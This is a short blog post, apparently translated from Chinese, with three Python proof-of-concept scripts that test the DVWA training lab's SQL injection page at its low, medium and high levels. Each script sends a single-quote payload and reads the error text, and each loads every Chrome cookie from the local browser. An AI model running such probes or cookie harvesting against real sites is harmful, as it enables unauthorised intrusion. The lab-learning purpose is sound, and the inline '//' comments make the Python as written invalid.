POC——DVWA‘s SQL Injection

Recently, I began to try to write some by myself POC, From basic DVWA Let's start the shooting range , Update from time to time ~

Level——low:

import requests
import browser_cookie3

cookie = browser_cookie3.chrome()  // To obtain the chrome All visited cookie, See if there is any way to get only the current , And this method seems to have only chrome Sure ,firefox Not very good 
response = requests.get("http://192.168.117.133/dvwa/vulnerabilities/sqli/?id=1'&Submit=Submit#",cookies=cookie)

re = 'syntax'
flag=re in str(response.content)

if flag:
    print("It looks likely vulnerable")
else:
    print("It is strong")

Level——Medium

 1 import requests
 2 import browser_cookie3
 3 
 4 cookie = browser_cookie3.chrome()
 5 datas = {"id":"1'","Submit":"Submit"}　　// Here because Content-Type:application/x-www-form-urlencoded, therefore post Constructed as this pattern （ according to Payload Internal value ）
 6 response = requests.post("http://192.168.117.130/DVWA-1.9/vulnerabilities/sqli/?id=1'&Submit=Submit#",cookies=cookie,data=datas)
 7 
 8 re = 'syntax'
 9 flag=re in str(response.content)
10 
11 if flag:
12     print("It looks likely vulnerable")
13 else:
14     print("It is strong")

Level——High

 1 import requests
 2 import browser_cookie3
 3 
 4 cookie = browser_cookie3.chrome()
 5 datas = {"id":"1'","Submit":"Submit"}
 6 response1 = requests.post("http://192.168.117.130/DVWA-1.9/vulnerabilities/sqli/session-input.php",cookies=cookie,data=datas)
 7 response2 = requests.get("http://192.168.117.130/DVWA-1.9/vulnerabilities/sqli/",cookies=cookie)　　//high in , Query and echo are not in the same page , So here's the point post Query and get Access to the page 
 8 
 9 re = 'wrong'　　// Here we change the characteristic sentence 
10 flag=re in str(response2.content)
11 
12 if flag:
13     print("It looks likely vulnerable")
14 else:
15     print("It is strong")